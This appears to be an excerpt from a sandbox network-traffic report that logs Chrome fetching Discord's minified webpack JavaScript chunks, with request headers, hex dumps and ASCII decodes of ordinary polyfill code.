                                                                          Data Ascii: ttpContext},Dedupe:function(){return w.Dedupe},Integrations:function(){return k}});var r=n("675065"),i=n("714090"),a=n("57738"),s=n("16113"),o=n("998211"),c=n("235410"),l=n("4362"),u=n("130178"),d=n("837808"),h=n("697637"),f=n("321798"),p=n("530271"),_=n(


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          247192.168.2.549981162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:10 UTC866OUTGET /assets/22843.1bda3edd4dd152273661.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=L2cdwzEiZXRsWVQDn5J7qG2EKtpfMxMPTt5WH8bmYfk-1702226710451-0-604800000
                                                                          2023-12-10 16:45:11 UTC965INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 31 30 35 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 30 39 39 38 32 37 34 33 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:11 GMTContent-Type: application/javascriptContent-Length: 21050Connection: closeCF-Ray: 8336f4f09982743d-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:11 UTC404INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 32 38 34 33 22 5d 2c 7b 33 33 38 32 38 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 39 30 34 35 32 30 22 29 2c 6f 3d 6e 28 22 36 34 39 36 37 35 22 29 2c 69 3d 54 79 70 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 28 74 29 29 72 65 74 75 72 6e 20 74 3b 74 68 72 6f 77 20 69 28 6f 28 74 29 2b 22 20 69 73 20 6e 6f 74 20 61 20 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 7d 7d 2c 38 38 30 35 32 3a 66 75 6e 63 74 69 6f 6e 28
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22843"],{338286:function(t,r,n){"use strict";var e=n("904520"),o=n("649675"),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a constructor")}},88052:function(
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 44 61 74 61 56 69 65 77 7d 2c 31 38 38 35 32 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 6f 2c 69 2c 75 3d 6e 28 22 33 34 31 30 38 38 22 29 2c 66 3d 6e 28 22 38 31 34 30 32 36 22 29 2c 63 3d 6e 28 22 35 30 33 34 38 36 22 29 2c 61 3d 6e 28 22 31 32 35 33 35 39 22 29 2c 73 3d 6e 28 22 34 37 32 39 36 30 22 29 2c 79 3d 6e 28 22 35 39 33 39 33 22 29 2c 68 3d 6e 28 22 36 38 31 38 30 32 22 29 2c 70 3d 6e 28 22 36 34 39 36 37 35 22 29 2c 76 3d 6e 28 22 33 36 36 34 38 33
                                                                          Data Ascii: {"use strict";t.exports="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof DataView},188523:function(t,r,n){"use strict";var e,o,i,u=n("341088"),f=n("814026"),c=n("503486"),a=n("125359"),s=n("472960"),y=n("59393"),h=n("681802"),p=n("649675"),v=n("366483
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 30 2c 67 28 4d 2c 4c 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 28 74 68 69 73 29 3f 74 68 69 73 5b 55 5d 3a 76 6f 69 64 20 30 7d 7d 29 2c 56 29 63 5b 65 5d 26 26 76 28 63 5b 65 5d 2c 55 2c 65 29 3b 74 2e 65 78 70 6f 72 74 73 3d 7b 4e 41 54 49 56 45 5f 41 52 52 41 59 5f 42 55 46 46 45 52 5f 56 49 45 57 53 3a 4f 2c 54 59 50 45 44 5f 41 52 52 41 59 5f 54 41 47 3a 43 26 26 55 2c 61 54 79 70 65 64 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 50 28 74 29 29 72 65 74 75 72 6e 20 74 3b 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 61 72 67 65 74 20 69 73 20 6e 6f 74 20 61 20 74 79 70 65 64 20 61 72 72 61 79 22 29 7d 2c 61 54 79 70 65 64 41 72 72 61 79 43 6f
                                                                          Data Ascii: 0,g(M,L,{configurable:!0,get:function(){return s(this)?this[U]:void 0}}),V)c[e]&&v(c[e],U,e);t.exports={NATIVE_ARRAY_BUFFER_VIEWS:O,TYPED_ARRAY_TAG:C&&U,aTypedArray:function(t){if(P(t))return t;throw TypeError("Target is not a typed array")},aTypedArrayCo
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 74 6f 74 79 70 65 22 2c 5f 3d 22 57 72 6f 6e 67 20 69 6e 64 65 78 22 2c 4c 3d 49 2e 67 65 74 74 65 72 46 6f 72 28 6d 29 2c 55 3d 49 2e 67 65 74 74 65 72 46 6f 72 28 46 29 2c 42 3d 49 2e 73 65 74 2c 4f 3d 65 5b 6d 5d 2c 43 3d 4f 2c 56 3d 43 26 26 43 5b 4d 5d 2c 4e 3d 65 5b 46 5d 2c 57 3d 4e 26 26 4e 5b 4d 5d 2c 50 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 41 72 72 61 79 3d 65 2e 41 72 72 61 79 2c 52 61 6e 67 65 45 72 72 6f 72 3d 65 2e 52 61 6e 67 65 45 72 72 6f 72 2c 59 3d 6f 28 78 29 2c 53 3d 6f 28 5b 5d 2e 72 65 76 65 72 73 65 29 2c 44 3d 67 2e 70 61 63 6b 2c 6b 3d 67 2e 75 6e 70 61 63 6b 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 5b 32 35 35 26 74 5d 7d 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 5b 32
                                                                          Data Ascii: totype",_="Wrong index",L=I.getterFor(m),U=I.getterFor(F),B=I.set,O=e[m],C=O,V=C&&C[M],N=e[F],W=N&&N[M],P=Object.prototype,Array=e.Array,RangeError=e.RangeError,Y=o(x),S=o([].reverse),D=g.pack,k=g.unpack,G=function(t){return[255&t]},j=function(t){return[2
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 34 3e 3e 32 34 29 7d 7d 2c 7b 75 6e 73 61 66 65 3a 21 30 7d 29 7d 65 6c 73 65 20 56 3d 28 43 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 68 28 74 68 69 73 2c 56 29 3b 76 61 72 20 72 3d 64 28 74 29 3b 42 28 74 68 69 73 2c 7b 74 79 70 65 3a 6d 2c 62 79 74 65 73 3a 59 28 41 72 72 61 79 28 72 29 2c 30 29 2c 62 79 74 65 4c 65 6e 67 74 68 3a 72 7d 29 2c 21 69 26 26 28 74 68 69 73 2e 62 79 74 65 4c 65 6e 67 74 68 3d 72 2c 74 68 69 73 2e 64 65 74 61 63 68 65 64 3d 21 31 29 7d 29 5b 4d 5d 2c 57 3d 28 4e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 68 28 74 68 69 73 2c 57 29 2c 68 28 74 2c 56 29 3b 76 61 72 20 65 3d 4c 28 74 29 2c 6f 3d 65 2e 62 79 74 65 4c 65 6e 67 74 68 2c 75 3d 70 28 72 29 3b 69 66 28 75 3c 30 7c 7c 75 3e 6f 29 74 68 72 6f 77 20 52 61 6e 67 65
                                                                          Data Ascii: 4>>24)}},{unsafe:!0})}else V=(C=function(t){h(this,V);var r=d(t);B(this,{type:m,bytes:Y(Array(r),0),byteLength:r}),!i&&(this.byteLength=r,this.detached=!1)})[M],W=(N=function(t,r,n){h(this,W),h(t,V);var e=L(t),o=e.byteLength,u=p(r);if(u<0||u>o)throw Range
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 7d 2c 73 65 74 49 6e 74 33 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 58 28 74 68 69 73 2c 34 2c 74 2c 4b 2c 72 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 7d 2c 73 65 74 55 69 6e 74 33 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 58 28 74 68 69 73 2c 34 2c 74 2c 4b 2c 72 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 7d 2c 73 65 74 46 6c 6f 61 74 33 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 58 28 74 68 69 73 2c 34 2c 74 2c 7a 2c 72 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 7d 2c 73 65 74 46 6c 6f 61 74
                                                                          Data Ascii: length>2&&arguments[2])},setInt32:function(t,r){X(this,4,t,K,r,arguments.length>2&&arguments[2])},setUint32:function(t,r){X(this,4,t,K,r,arguments.length>2&&arguments[2])},setFloat32:function(t,r){X(this,4,t,z,r,arguments.length>2&&arguments[2])},setFloat
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 6c 7c 7c 63 2c 6d 3d 72 3f 52 28 76 2c 49 29 3a 6e 7c 7c 68 3f 52 28 76 2c 30 29 3a 76 6f 69 64 20 30 3b 49 3e 45 3b 45 2b 2b 29 69 66 28 28 70 7c 7c 45 20 69 6e 20 62 29 26 26 28 77 3d 54 28 41 3d 62 5b 45 5d 2c 45 2c 78 29 2c 74 29 29 7b 69 66 28 72 29 6d 5b 45 5d 3d 77 3b 65 6c 73 65 20 69 66 28 77 29 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 21 30 3b 63 61 73 65 20 35 3a 72 65 74 75 72 6e 20 41 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 45 3b 63 61 73 65 20 32 3a 61 28 6d 2c 41 29 7d 65 6c 73 65 20 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 21 31 3b 63 61 73 65 20 37 3a 61 28 6d 2c 41 29 7d 7d 72 65 74 75 72 6e 20 79 3f 2d 31 3a 6f 7c 7c 73 3f 73 3a 6d 7d 7d 3b 74 2e 65 78 70 6f 72 74 73 3d 7b 66
                                                                          Data Ascii: l||c,m=r?R(v,I):n||h?R(v,0):void 0;I>E;E++)if((p||E in b)&&(w=T(A=b[E],E,x),t)){if(r)m[E]=w;else if(w)switch(t){case 3:return!0;case 5:return A;case 6:return E;case 2:a(m,A)}else switch(t){case 4:return!1;case 7:a(m,A)}}return y?-1:o||s?s:m}};t.exports={f
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 74 75 72 6e 20 6e 65 77 28 65 28 74 29 29 28 30 3d 3d 3d 72 3f 30 3a 72 29 7d 7d 2c 35 35 32 35 31 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 33 30 38 32 37 34 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 66 6f 72 28 76 61 72 20 6e 3d 65 28 74 29 2c 6f 3d 6e 65 77 20 72 28 6e 29 2c 69 3d 30 3b 69 3c 6e 3b 69 2b 2b 29 6f 5b 69 5d 3d 74 5b 6e 2d 69 2d 31 5d 3b 72 65 74 75 72 6e 20 6f 7d 7d 2c 39 36 30 30 34 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 33 30 38 32 37 34 22 29 2c 6f 3d 6e 28 22 39 36 39 37 30 38 22 29 2c 69 3d 52 61 6e 67 65 45 72 72 6f 72 3b 74 2e 65 78 70
                                                                          Data Ascii: turn new(e(t))(0===r?0:r)}},552512:function(t,r,n){"use strict";var e=n("308274");t.exports=function(t,r){for(var n=e(t),o=new r(n),i=0;i<n;i++)o[i]=t[n-i-1];return o}},960049:function(t,r,n){"use strict";var e=n("308274"),o=n("969708"),i=RangeError;t.exp
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 34 30 34 34 34 36 22 29 2c 6f 3d 6e 28 22 37 32 37 32 30 34 22 29 2c 69 3d 6e 28 22 34 30 36 32 31 39 22 29 2c 75 3d 65 28 65 2e 62 69 6e 64 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 6f 28 74 29 2c 76 6f 69 64 20 30 3d 3d 3d 72 3f 74 3a 69 3f 75 28 74 2c 72 29 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 61 70 70 6c 79 28 72 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 7d 2c 34 30 34 34 34 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 37 34 35 37 39 35 22 29 2c 6f 3d 6e 28 22 36 34 39 38 30 22 29
                                                                          Data Ascii: 9:function(t,r,n){"use strict";var e=n("404446"),o=n("727204"),i=n("406219"),u=e(e.bind);t.exports=function(t,r){return o(t),void 0===r?t:i?u(t,r):function(){return t.apply(r,arguments)}}},404446:function(t,r,n){"use strict";var e=n("745795"),o=n("64980")


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          248192.168.2.549982162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:10 UTC866OUTGET /assets/94288.dbd73ecb6b1482a870b7.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=aDxqWxmtKzcKeNc4IMfmcFpoMNSAUV.5pLaNR6SS2V8-1702226710633-0-604800000
                                                                          2023-12-10 16:45:11 UTC1124INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 30 33 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 30 66 63 30 35 30 33 33 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:11 GMTContent-Type: application/javascriptContent-Length: 10034Connection: closeCF-Ray: 8336f4f0fc050331-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:11 UTC245INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 39 34 32 38 38 22 5d 2c 7b 34 37 34 31 37 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 36 39 36 33 39 37 22 29 2e 63 68 61 72 41 74 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2b 28 6e 3f 65 28 74 2c 72 29 2e 6c 65 6e 67 74 68 3a 31 29 7d 7d 2c 36 38 31 38 30 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 35
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["94288"],{474172:function(t,r,n){"use strict";var e=n("696397").charAt;t.exports=function(t,r,n){return r+(n?e(t,r).length:1)}},681802:function(t,r,n){"use strict";var e=n("5
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 33 37 38 36 22 29 2c 69 3d 6e 28 22 31 32 35 33 35 39 22 29 2c 75 3d 6e 28 22 37 34 35 37 39 35 22 29 2c 6f 3d 6e 28 22 31 37 34 36 36 39 22 29 28 22 74 6f 53 74 72 69 6e 67 54 61 67 22 29 2c 63 3d 4f 62 6a 65 63 74 2c 61 3d 22 41 72 67 75 6d 65 6e 74 73 22 3d 3d 3d 75 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 7d 28 29 29 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 74 5b 72 5d 7d 63 61 74 63 68 28 74 29 7b 7d 7d 3b 74 2e 65 78 70 6f 72 74 73 3d 65 3f 75 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 72 2c 6e 2c 65 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 3f 22 55 6e 64 65 66 69 6e 65 64 22 3a 6e 75 6c 6c 3d 3d 3d 74 3f 22 4e 75 6c 6c 22 3a 22 73 74 72 69 6e
                                                                          Data Ascii: 3786"),i=n("125359"),u=n("745795"),o=n("174669")("toStringTag"),c=Object,a="Arguments"===u(function(){return arguments}()),s=function(t,r){try{return t[r]}catch(t){}};t.exports=e?u:function(t){var r,n,e;return void 0===t?"Undefined":null===t?"Null":"strin
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 3d 21 30 2c 6e 75 6c 6c 7d 2c 6e 5b 70 5d 28 22 22 29 2c 21 72 7d 29 3b 69 66 28 21 76 7c 7c 21 78 7c 7c 6e 29 7b 76 61 72 20 68 3d 65 28 2f 2e 2f 5b 70 5d 29 2c 64 3d 72 28 70 2c 22 22 5b 74 5d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 2c 69 2c 6f 29 7b 76 61 72 20 63 3d 65 28 74 29 2c 61 3d 72 2e 65 78 65 63 3b 69 66 28 61 3d 3d 3d 75 7c 7c 61 3d 3d 3d 66 2e 65 78 65 63 29 72 65 74 75 72 6e 20 76 26 26 21 6f 3f 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 68 28 72 2c 6e 2c 69 29 7d 3a 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 63 28 6e 2c 72 2c 69 29 7d 3b 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 31 7d 7d 29 3b 69 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2c 74 2c 64 5b 30 5d 29 2c 69 28
                                                                          Data Ascii: unction(){return r=!0,null},n[p](""),!r});if(!v||!x||n){var h=e(/./[p]),d=r(p,""[t],function(t,r,n,i,o){var c=e(t),a=r.exec;if(a===u||a===f.exec)return v&&!o?{done:!0,value:h(r,n,i)}:{done:!0,value:c(n,r,i)};return{done:!1}});i(String.prototype,t,d[0]),i(
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 69 6f 6e 28 74 2c 72 29 7b 65 28 72 29 26 26 22 63 61 75 73 65 22 69 6e 20 72 26 26 69 28 74 2c 22 63 61 75 73 65 22 2c 72 2e 63 61 75 73 65 29 7d 7d 2c 33 39 31 33 35 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 39 39 38 32 37 30 22 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 3f 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 32 3f 22 22 3a 72 3a 65 28 74 29 7d 7d 2c 36 38 31 36 34 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 35 34 31 33 36 38 22 29 2e 66 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c
                                                                          Data Ascii: ion(t,r){e(r)&&"cause"in r&&i(t,"cause",r.cause)}},391358:function(t,r,n){"use strict";var e=n("998270");t.exports=function(t,r){return void 0===t?arguments.length<2?"":r:e(t)}},681645:function(t,r,n){"use strict";var e=n("541368").f;t.exports=function(t,
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 2e 6c 61 73 74 49 6e 64 65 78 29 2c 74 68 69 73 2e 6c 61 73 74 49 6e 64 65 78 3e 30 26 26 28 21 74 68 69 73 2e 6d 75 6c 74 69 6c 69 6e 65 7c 7c 74 68 69 73 2e 6d 75 6c 74 69 6c 69 6e 65 26 26 22 5c 6e 22 21 3d 3d 79 28 78 2c 74 68 69 73 2e 6c 61 73 74 49 6e 64 65 78 2d 31 29 29 26 26 28 43 3d 22 28 3f 3a 20 22 2b 43 2b 22 29 22 2c 4f 3d 22 20 22 2b 4f 2c 77 2b 2b 29 2c 6e 3d 52 65 67 45 78 70 28 22 5e 28 3f 3a 22 2b 43 2b 22 29 22 2c 54 29 29 2c 6d 26 26 28 6e 3d 52 65 67 45 78 70 28 22 5e 22 2b 43 2b 22 24 28 3f 21 5c 5c 73 29 22 2c 54 29 29 2c 52 26 26 28 65 3d 74 68 69 73 2e 6c 61 73 74 49 6e 64 65 78 29 2c 69 3d 75 28 64 2c 41 3f 6e 3a 74 68 69 73 2c 4f 29 2c 41 3f 69 3f 28 69 2e 69 6e 70 75 74 3d 49 28 69 2e 69 6e 70 75 74 2c 77 29 2c 69 5b 30 5d 3d
                                                                          Data Ascii: .lastIndex),this.lastIndex>0&&(!this.multiline||this.multiline&&"\n"!==y(x,this.lastIndex-1))&&(C="(?: "+C+")",O=" "+O,w++),n=RegExp("^(?:"+C+")",T)),m&&(n=RegExp("^"+C+"$(?!\\s)",T)),R&&(e=this.lastIndex),i=u(d,A?n:this,O),A?i?(i.input=I(i.input,w),i[0]=
                                                                          2023-12-10 16:45:11 UTC1369INData Raw: 29 7d 29 7d 2c 33 34 38 31 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 36 36 34 31 34 34 22 29 2c 69 3d 6e 28 22 35 30 33 34 38 36 22 29 2e 52 65 67 45 78 70 3b 74 2e 65 78 70 6f 72 74 73 3d 65 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 69 28 22 28 3f 3c 61 3e 62 29 22 2c 22 67 22 29 3b 72 65 74 75 72 6e 22 62 22 21 3d 3d 74 2e 65 78 65 63 28 22 62 22 29 2e 67 72 6f 75 70 73 2e 61 7c 7c 22 62 63 22 21 3d 3d 22 62 22 2e 72 65 70 6c 61 63 65 28 74 2c 22 24 3c 61 3e 63 22 29 7d 29 7d 2c 36 39 36 33 39 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 6e 28 22 36 34 39 38 30 22 29 2c 69 3d 6e 28 22 39 36 39 37 30
                                                                          Data Ascii: )})},34810:function(t,r,n){"use strict";var e=n("664144"),i=n("503486").RegExp;t.exports=e(function(){var t=i("(?<a>b)","g");return"b"!==t.exec("b").groups.a||"bc"!=="b".replace(t,"$<a>c")})},696397:function(t,r,n){"use strict";var e=n("64980"),i=n("96970
